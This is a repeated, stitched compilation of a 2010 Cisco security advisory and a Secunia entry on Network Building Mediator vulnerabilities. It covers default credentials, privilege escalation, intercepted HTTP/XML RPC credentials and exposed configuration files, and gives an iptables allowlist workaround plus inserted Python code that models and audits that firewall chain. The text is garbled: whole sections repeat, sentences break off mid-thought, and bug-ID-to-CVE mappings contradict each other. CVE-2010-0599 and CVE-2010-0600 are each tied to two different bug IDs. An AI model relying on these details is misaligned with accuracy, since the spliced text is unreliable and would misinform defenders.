Privilege escalation
+-------------------
There are no workarounds for these vulnerabilities.
Unauthorized information interception
+------------------------------------
The following workaround is applicable only to the vulnerability
related to HTTP protocol. There is no workaround for the
vulnerability that affects the XML RPC service. The HTTPS service is enabled and running by
default and no further actions are needed to enable it. The HTTP
service can be disabled with configTOOL. Inside the Node tree pane, expand the services tab, and
then expand the network tab. Click the http_server tab, and then
click Enabled to uncheck it.
Unauthorized information access
+------------------------------
There is no workaround for this vulnerability. In
the following examples it is assumed that the operator console has IP
address 192.0.2.1. The 192.0.2.1 address must be changed to match the
IP address used by the designated operator console. The following
code must be entered on the console. Please refer to section 2.4 in
the user guide at
http://www.cisco.com/en/US/docs/security/physical_security/cnbm/User/guide/CNBM__UG.pdf
for information on how to connect to the serial port using
hyper-terminal.
# The following rule establishes a default policy for INPUT rule chain.
# The default policy is to drop all packets unless they are explicitly
# permitted by a rule in the INPUT chain
iptables -P INPUT DROP
# This rule will allow all traffic from operator console with
# IP address of 192.0.2.1 to the Cisco NBM
#
# Change 192.0.2.1 to match IP address used by your operators console.
iptables -I INPUT 1 --source 192.0.2.1 -j ACCEPT
# Repeat the previous command if you have more than one operator console.
# Increment the number after the "INPUT" keyword for each console you
# are adding.
#
# This command will allow second operator console with IP address
# of 192.0.2.2 to access the Cisco NBM
iptables -I INPUT 2 --source 192.0.2.2 -j ACCEPT
When applying rules from the above example care must be taken to
allow access to ports or protocols that are used by sensors and other
devices deployed in the system that are monitored and controlled by
the Cisco Network Building Mediator. Failure to do so will break
connectivity to these sensors and devices.
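The iptables workaround above (and its identical copy earlier on this page) sets a DROP policy on the INPUT chain and then admits only the operator consoles, and the caveat warns that sensor and device protocols must be admitted too or the Mediator loses contact with them. The following Python is an added example, not Cisco's code or part of the advisory: a minimal first-match model of the INPUT chain, built exactly as the workaround builds it, evaluated against constructed sample traffic so the consequence of the caveat is visible before any rule is applied to a live device. The sensor's protocol and port (BACnet/IP on UDP 47808) and the `Packet`, `Rule` and `InputChain` names are this example's assumptions.

```python
"""First-match model of the advisory's INPUT-chain workaround (added example).

Not Cisco's code. Models `iptables -P INPUT DROP` plus `-I INPUT n --source X
-j ACCEPT` rules and evaluates sample packets against them, to show which
traffic the workaround admits and which it silently drops.
"""
from dataclasses import dataclass, field
from ipaddress import ip_address, ip_network
from typing import List, Optional


@dataclass
class Packet:
    src: str     # source IP address
    proto: str   # "tcp" or "udp"
    dport: int   # destination port on the Mediator


@dataclass
class Rule:
    target: str                   # ACCEPT or DROP
    source: Optional[str] = None  # address or CIDR, as in "--source 192.0.2.1"
    proto: Optional[str] = None   # as in "-p udp"
    dport: Optional[int] = None   # as in "--dport 47808"

    def matches(self, pkt: Packet) -> bool:
        """A rule matches only if every match it specifies holds."""
        if self.source and ip_address(pkt.src) not in ip_network(self.source, strict=False):
            return False
        if self.proto and pkt.proto != self.proto:
            return False
        if self.dport is not None and pkt.dport != self.dport:
            return False
        return True

    def as_command(self) -> str:
        """Render as an append command; appending in chain order rebuilds the same chain."""
        parts = ["iptables", "-A", "INPUT"]
        if self.source:
            parts += ["--source", self.source]
        if self.proto:
            parts += ["-p", self.proto]
        if self.dport is not None:
            parts += ["--dport", str(self.dport)]
        parts += ["-j", self.target]
        return " ".join(parts)


@dataclass
class InputChain:
    policy: str = "ACCEPT"                         # iptables -P INPUT <policy>
    rules: List[Rule] = field(default_factory=list)

    def insert(self, position: int, rule: Rule) -> None:
        """iptables -I INPUT <position> ...; positions are 1-based, as in iptables."""
        self.rules.insert(position - 1, rule)

    def append(self, rule: Rule) -> None:
        """iptables -A INPUT ..."""
        self.rules.append(rule)

    def verdict(self, pkt: Packet) -> str:
        """The first matching rule decides; with no match the chain policy applies."""
        for rule in self.rules:
            if rule.matches(pkt):
                return rule.target
        return self.policy

    def as_commands(self) -> List[str]:
        return [f"iptables -P INPUT {self.policy}"] + [r.as_command() for r in self.rules]


def advisory_chain() -> InputChain:
    """The chain exactly as the advisory's workaround builds it."""
    chain = InputChain(policy="DROP")
    chain.insert(1, Rule("ACCEPT", source="192.0.2.1"))  # first operator console
    chain.insert(2, Rule("ACCEPT", source="192.0.2.2"))  # second operator console
    return chain


def amended_chain(sensor_rules: List[Rule]) -> InputChain:
    """Advisory chain plus the sensor/device allowances the caveat calls for."""
    chain = advisory_chain()
    for rule in sensor_rules:
        chain.append(rule)
    return chain


# Constructed sample traffic. The sensor's protocol and port (BACnet/IP on
# UDP 47808) are an assumption for illustration; the page names no protocol.
SAMPLE_TRAFFIC = {
    "console_1": Packet("192.0.2.1", "tcp", 443),
    "console_2": Packet("192.0.2.2", "tcp", 443),
    "unknown_host": Packet("198.51.100.7", "tcp", 80),
    "sensor": Packet("192.0.2.50", "udp", 47808),
}


def verdicts(chain: InputChain) -> dict:
    """Verdict for every sample packet, keyed by its label."""
    return {name: chain.verdict(pkt) for name, pkt in SAMPLE_TRAFFIC.items()}


if __name__ == "__main__":
    before = advisory_chain()
    after = amended_chain([Rule("ACCEPT", proto="udp", dport=47808)])
    for label, chain in (("advisory workaround", before), ("with sensor rule", after)):
        print(f"--- {label} ---")
        print("\n".join(chain.as_commands()))
        print(verdicts(chain))
```

With the advisory's rules alone, the two consoles are accepted and the unknown host is dropped, which is the intended effect, but the sensor is dropped as well; appending one rule for the sensor's protocol restores it without widening access for anything else. On a real device, list the protocols and ports each monitored system uses and add a rule of that shape for each before setting the DROP policy, since the policy takes effect immediately.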
Additional mitigation techniques that can be deployed on Cisco
devices within the network are available in the Cisco Applied
Mitigation Bulletin companion document for this advisory:
http://www.cisco.com/warp/public/707/cisco-amb-20100526-mediator.shtml
Obtaining Fixed Software
========================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerabilities described in this advisory.
These vulnerabilities were discovered during internal testing.
Status of this Notice: FINAL
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at:
http://www.cisco.com/warp/public/707/cisco-sa-20100526-mediator.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+--------------+-------------+-------------------------+
| Revision 1.0 | 2010-May-26 | Initial public release. |
+--------------+-------------+-------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco
security notices. All Cisco security advisories are available at
http://www.cisco.com/go/psirt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (Darwin)
iEYEARECAAYFAkv9S00ACgkQ86n/Gc8U/uDJRQCcCCww9H/6P7BHqAZ9k29Tq4hj
EWQAn3eEfS/iAcbfn5ERow7JQO4QmnPg
=bCsA
-----END PGP SIGNATURE-----
----------------------------------------------------------------------
TITLE:
Cisco Network Building Mediator Products Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA39904
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/39904/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=39904
RELEASE DATE:
2010-05-27
DISCUSS ADVISORY:
http://secunia.com/advisories/39904/#comments
DESCRIPTION:
Some vulnerabilities have been reported in Cisco Network Building
Mediator, which can be exploited by malicious users to gain escalated
privileges and by malicious people to gain knowledge of sensitive
information.
2) Certain sensitive information (e.g. credentials) is passed via
HTTP and XML-RPC over HTTP and may, therefore, be intercepted by a
third party.
SOLUTION:
Update to a fixed version.
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://www.cisco.com/warp/public/707/cisco-sa-20100526-mediator.shtml
----------------------------------------------------------------------
VAR-201005-0903 | CVE-2010-0597 | Cisco Network Building Mediator products contain multiple vulnerabilities |
CVSS V2: 9.0 CVSS V3: - Severity: HIGH |
Unspecified vulnerability in Cisco Mediator Framework 1.5.1 before 1.5.1.build.14-eng, 2.2 before 2.2.1.dev.1, and 3.0 before 3.0.9.release.1 on the Cisco Network Building Mediator NBM-2400 and NBM-4800 and the Richards-Zeta Mediator 2500 allows remote authenticated users to read or modify the device configuration, and gain privileges or cause a denial of service (device reload), via a (1) XML RPC or (2) XML RPC over HTTPS request, aka Bug ID CSCtb83618. The Cisco Network Building Mediator is a smart, interconnected building solution that interconnects and operates heating, ventilation and cooling (HVAC), lighting, power, security, and renewable energy systems over IP networks. Both privilege escalation vulnerabilities (CVE-2010-0596, CVE-2010-0597) must be attacked over the HTTP or HTTPS transport protocol. In addition, the Cisco bug ID CSCtb83618 (CVE-2010-0597) vulnerability can be used to reload the device; repeated exploitation can lead to a denial of service. - Unauthorized information interception (CVE-2010-0598, CVE-2010-0599): sessions between an operator workstation and the Cisco Network Building Mediator are not protected against interception; a malicious user who intercepts a session can obtain any authentication credentials used in it and use them to control the device. CVE-2010-0598 allows a malicious user who intercepts an HTTP session to obtain administrator authentication credentials; CVE-2010-0599 allows the same for an intercepted XML RPC session. - Unauthorized information access (CVE-2010-0600): a malicious user can read the system configuration file, which contains user account information, including passwords, via XML RPC or XML RPC over HTTPS. This issue is tracked by Cisco Bug ID CSCtb83618.
An authenticated attacker can exploit this issue to read and modify configuration settings, gaining elevated privileges. This may lead to a full compromise of the affected device. In addition, attackers can leverage this issue to cause the device to reload; successive attacks will result in a prolonged denial-of-service. These vulnerabilities also affect the legacy
Richards-Zeta Mediator products. This security advisory outlines
details of the following vulnerabilities:
* Default credentials
* Privilege escalation
* Unauthorized information interception
* Unauthorized information access
Cisco has released free software updates that address these
vulnerabilities. Workarounds that mitigate some of the listed
vulnerabilities are available. After a successful login, the
device will display the version of Mediator Framework running on the
device. This ability
enables the Cisco Network Building Mediator to perform any-to-any
protocol translation and to provide information to the end user in a
uniform presentation. These vulnerabilities are independent of each other.
Default credentials
+------------------
Default credentials are assigned for several predefined user accounts
on the device including the administrative user account.
* CSCtb83495 ( registered customers only) has been assigned the CVE
identifier CVE-2010-0595.
* CSCtb83607 ( registered customers only) has been assigned the CVE
identifier CVE-2010-0596.
This vulnerability could enable any user to read and modify
device configuration.
* CSCtb83618 ( registered customers only) has been assigned the CVE
identifier CVE-2010-0597. A malicious user
able to intercept the sessions could learn any credentials used
during intercepted sessions (for administrators and
non-administrators alike) and could subsequently take full control of
the device.
* CSCtb83631 ( registered customers only) has been assigned CVE
identifier CVE-2010-0598.
* CSCtb83505 ( registered customers only) has been assigned CVE
identifier CVE-2010-0599.
* CSCtb83512 ( registered customers only) has been assigned CVE
identifier CVE-2010-0600.
Vulnerability Scoring Details
=============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this security advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at
http://intellishield.cisco.com/security/alertmanager/cvss
CSCtb83495 - Default credentials present on the system
CVSS Base Score - 10
Access Vector Network
Access Complexity Low
Authentication None
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 8.3
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83607 - Privilege escalation possible over HTTP protocol
CVSS Base Score - 9
Access Vector Network
Access Complexity Low
Authentication Single
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 7.4
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83618 - Privilege escalation possible over XML RPC protocol
CVSS Base Score - 9
Access Vector Network
Access Complexity Low
Authentication Single
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 7.4
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83631 - Possible intercept of unencrypted HTTP sessions
CVSS Base Score - 9.3
Access Vector Network
Access Complexity Medium
Authentication None
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 7.7
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83505 - Possible intercept of unencrypted XML RPC sessions
CVSS Base Score - 9.3
Access Vector Network
Access Complexity Medium
Authentication None
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 7.7
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83512 - Access to sensitive information over XML RPC
CVSS Base Score - 10
Access Vector Network
Access Complexity Low
Authentication None
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 8.3
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
Impact
======
Successful exploitation of any of these vulnerabilities could result
in a malicious user taking complete control over an affected device.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
Each row of the software table below names a Mediator Framework
software release. If a given software release is vulnerable, then the
earliest possible releases that contain the fix (along with the
anticipated date of availability for each, if applicable) are listed
in the "First Fixed Release" column of the table. Cisco recommends
upgrading to the latest available release where possible. All
vulnerabilities are fixed in Mediator Framework release 3.1.1 and
above. Mediator Framework release 3.1.1 is the recommended migration
path for all Mediator Framework releases.
These vulnerabilities do not affect the Mediator Operating Environment.
To obtain fixed 1.5.1 and 2.2 Mediator Framework software and
configTOOL version 3.1.0b1, contact Cisco TAC.
Privilege escalation
+-------------------
There are no workarounds for these vulnerabilities.
Unauthorized information interception
+------------------------------------
The following workaround is applicable only to the vulnerability
related to the HTTP protocol. There is no workaround for the
vulnerability that affects the XML RPC service. The HTTPS service is enabled and running by
default and no further action is needed to enable it. The HTTP
service can be disabled with configTOOL. Inside the Node tree pane, expand the services tab, and
then expand the network tab. Click the http_server tab, and then
click Enabled to uncheck it.
Unauthorized information access
+------------------------------
There is no workaround for this vulnerability. In
the following examples it is assumed that the operator console has IP
address 192.0.2.1. The 192.0.2.1 address must be changed to match the
IP address used by the designated operator console. The following
code must be entered on the console. Please refer to section 2.4 in
the user guide at
http://www.cisco.com/en/US/docs/security/physical_security/cnbm/User/guide/CNBM__UG.pdf
for information on how to connect to the serial port using
hyper-terminal.
# The following rule establishes a default policy for INPUT rule chain.
# The default policy is to drop all packets unless they are explicitly
# permitted by a rule in the INPUT chain
iptables -P INPUT DROP
# This rule will allow all traffic from the operator console with
# IP address 192.0.2.1 to the Cisco NBM
#
# Change 192.0.2.1 to match the IP address used by your operator's console.
iptables -I INPUT 1 --source 192.0.2.1 -j ACCEPT
# Repeat the previous command if you have more than one operator console.
# Increment the number after the "INPUT" keyword for each console you
# are adding.
#
# This command will allow a second operator console with IP address
# 192.0.2.2 to access the Cisco NBM
iptables -I INPUT 2 --source 192.0.2.2 -j ACCEPT
When applying rules from the above example, care must be taken to
allow access to the ports or protocols that are used by sensors and other
devices deployed in the system that are monitored and controlled by
the Cisco Network Building Mediator. Failure to do so will break
connectivity to these sensors and devices.
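The advisory gives the allowlist for two consoles and warns that sensor traffic must also be permitted, but offers no way to check a running device against that intent. The following Python helper is an added example, not part of the Cisco advisory: it generates the advisory's iptables commands for any number of designated consoles (validating each address first, and setting the DROP policy after the ACCEPT rules so the sequence is also safe to enter over a session that the chain itself governs), and it audits an iptables-save dump of the INPUT chain for the conditions the workaround describes: default policy DROP, one single-host ACCEPT per console, and no broader ACCEPT except on ports you have reserved for sensors. The sample dump, the 10.0.0.0/8 rule it flags and the sensor port 47808 are constructed for the example; nothing here applies rules to a device.

```python
import ipaddress


def parse_input_chain(dump):
    """Extract the INPUT chain policy and rules from iptables-save output.

    Each rule is a dict {src, proto, dport, target}; src is an ip_network
    (a bare address becomes a /32) and fields absent from the rule are None."""
    policy, rules = None, []
    for line in dump.splitlines():
        tokens = line.split()
        if not tokens:
            continue
        if tokens[0] == ":INPUT":                 # ':INPUT DROP [0:0]'
            policy = tokens[1]
        elif tokens[:2] == ["-A", "INPUT"]:
            rule = {"src": None, "proto": None, "dport": None, "target": None}
            for flag, value in zip(tokens, tokens[1:]):
                if flag in ("-s", "--source"):
                    rule["src"] = ipaddress.ip_network(value, strict=False)
                elif flag in ("-p", "--protocol"):
                    rule["proto"] = value
                elif flag == "--dport":
                    rule["dport"] = int(value)
                elif flag in ("-j", "--jump"):
                    rule["target"] = value
            rules.append(rule)
    return policy, rules


def audit_nbm_input_chain(dump, operator_consoles, sensor_ports=frozenset()):
    """Check the INPUT chain against the advisory's workaround: policy DROP,
    one ACCEPT per designated operator console, and nothing broader than
    that (ports reserved for sensors and other devices excepted).
    Returns a list of human-readable findings; empty means compliant."""
    consoles = [ipaddress.ip_address(c) for c in operator_consoles]
    policy, rules = parse_input_chain(dump)
    findings, covered = [], set()
    if policy != "DROP":
        findings.append(f"INPUT default policy is {policy}, expected DROP")
    for rule in rules:
        if rule["target"] != "ACCEPT":
            continue
        if rule["dport"] in sensor_ports:
            continue                              # service port kept open for sensors
        if rule["src"] is None:
            findings.append(f"ACCEPT rule without a source restriction (dport {rule['dport']})")
            continue
        hits = [c for c in consoles if c in rule["src"]]
        if hits and rule["src"].num_addresses == 1:
            covered.update(hits)
        else:
            findings.append(f"ACCEPT from {rule['src']} is not a single designated operator console")
    for console in consoles:
        if console not in covered:
            findings.append(f"no ACCEPT rule for operator console {console}")
    return findings


def build_nbm_input_rules(operator_consoles):
    """Emit the advisory's commands for any number of consoles. Each address is
    validated (ValueError on a typo) and the DROP policy is set last, so the
    sequence is also safe when typed over a session governed by the chain."""
    commands = []
    for position, console in enumerate(operator_consoles, start=1):
        address = ipaddress.ip_address(console)
        commands.append(f"iptables -I INPUT {position} --source {address} -j ACCEPT")
    commands.append("iptables -P INPUT DROP")
    return commands


# Constructed iptables-save excerpt: the advisory's two consoles, a broad /8
# ACCEPT that an audit should flag, and one hypothetical sensor port.
SAMPLE_DUMP = """\
*filter
:INPUT DROP [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -s 192.0.2.1/32 -j ACCEPT
-A INPUT -s 192.0.2.2/32 -j ACCEPT
-A INPUT -s 10.0.0.0/8 -j ACCEPT
-A INPUT -p udp -m udp --dport 47808 -j ACCEPT
COMMIT
"""
OPERATOR_CONSOLES = ["192.0.2.1", "192.0.2.2"]
SENSOR_PORTS = {47808}          # hypothetical sensor service port, constructed

if __name__ == "__main__":
    for cmd in build_nbm_input_rules(OPERATOR_CONSOLES):
        print(cmd)
    for finding in audit_nbm_input_chain(SAMPLE_DUMP, OPERATOR_CONSOLES, SENSOR_PORTS):
        print("finding:", finding)
```

Run against the sample dump, the audit reports only the 10.0.0.0/8 rule; the two console rules and the sensor-port rule pass. Feed it the output of `iptables-save` taken from a device to compare the deployed chain with the list of consoles and sensor ports you intended.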
Additional mitigation techniques that can be deployed on Cisco
devices within the network are available in the Cisco Applied
Mitigation Bulletin companion document for this advisory:
http://www.cisco.com/warp/public/707/cisco-amb-20100526-mediator.shtml
Obtaining Fixed Software
========================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerabilities described in this advisory.
These vulnerabilities were discovered during internal testing.
Status of this Notice: FINAL
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at:
http://www.cisco.com/warp/public/707/cisco-sa-20100526-mediator.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+--------------+-------------+-------------------------+
| Revision 1.0 | 2010-May-26 | Initial public release. |
+--------------+-------------+-------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco
security notices. All Cisco security advisories are available at
http://www.cisco.com/go/psirt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (Darwin)
iEYEARECAAYFAkv9S00ACgkQ86n/Gc8U/uDJRQCcCCww9H/6P7BHqAZ9k29Tq4hj
EWQAn3eEfS/iAcbfn5ERow7JQO4QmnPg
=bCsA
-----END PGP SIGNATURE-----
----------------------------------------------------------------------
TITLE:
Cisco Network Building Mediator Products Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA39904
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/39904/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=39904
RELEASE DATE:
2010-05-27
DISCUSS ADVISORY:
http://secunia.com/advisories/39904/#comments
DESCRIPTION:
Some vulnerabilities have been reported in Cisco Network Building
Mediator, which can be exploited by malicious users to gain escalated
privileges and by malicious people to gain knowledge of sensitive
information.
2) Certain sensitive information (e.g. credentials) is passed via
HTTP and XML-RPC over HTTP and may, therefore, be intercepted by a
third party.
SOLUTION:
Update to a fixed version.
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://www.cisco.com/warp/public/707/cisco-sa-20100526-mediator.shtml
----------------------------------------------------------------------
VAR-201005-0902 | CVE-2010-0599 | Cisco Network Building Mediator products contain multiple vulnerabilities |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Cisco Mediator Framework 1.5.1 before 1.5.1.build.14-eng, 2.2 before 2.2.1.dev.1, and 3.0 before 3.0.9.release.1 on the Cisco Network Building Mediator NBM-2400 and NBM-4800 and the Richards-Zeta Mediator 2500 does not encrypt XML RPC sessions from operator workstations, which allows remote attackers to discover Administrator credentials by sniffing the network, aka Bug ID CSCtb83505. Cisco Network Building Mediator (NBM) products are affected by multiple vulnerabilities that could allow an attacker to gain control of a vulnerable device or to cause a denial of service. This problem is tracked as Bug ID CSCtb83505. Administrator authentication credentials may be obtained by a third party who intercepts the session. The Cisco Network Building Mediator is a smart, interconnected building solution that interconnects and operates heating, ventilation and cooling (HVAC), lighting, power, security, and renewable energy systems over IP networks. There are several security vulnerabilities in Cisco Network Building Mediator, as follows: - Default authentication credentials (CVE-2010-0595): several predefined user accounts on the device, including the administrator account, use default credentials; any user with network access to the device can log in to the control system as an administrator. - Privilege escalation (CVE-2010-0596, CVE-2010-0597): these vulnerabilities allow unauthorized users to read and modify the device configuration. A malicious user must be able to authenticate successfully but does not need administrator privileges or knowledge of administrator credentials to read or modify the device configuration. Both vulnerabilities must be attacked over the HTTP or HTTPS transport protocol. In addition, the Cisco bug ID CSCtb83618 (CVE-2010-0597) vulnerability can be used to reload the device; repeated exploitation can lead to a denial of service.
CVE-2010-0598 allows a malicious user who intercepts an HTTP session to obtain administrator authentication credentials; CVE-2010-0599 allows the same for an intercepted XML RPC session. - Unauthorized information access (CVE-2010-0600): a malicious user can read the system configuration file, which contains user account information, including passwords, via XML RPC or XML RPC over HTTPS.
An attacker can exploit this issue to obtain sensitive information that may lead to further attacks and possibly a full compromise of the affected device.
This issue is tracked by Cisco Bug ID CSCtb83618. These vulnerabilities also affect the legacy
Richards-Zeta Mediator products. This security advisory outlines
details of the following vulnerabilities:
* Default credentials
* Privilege escalation
* Unauthorized information interception
* Unauthorized information access
Cisco has released free software updates that address these
vulnerabilities. Workarounds that mitigate some of the listed
vulnerabilities are available. After a successful login, the
device will display the version of Mediator Framework running on the
device. This ability
enables the Cisco Network Building Mediator to perform any-to-any
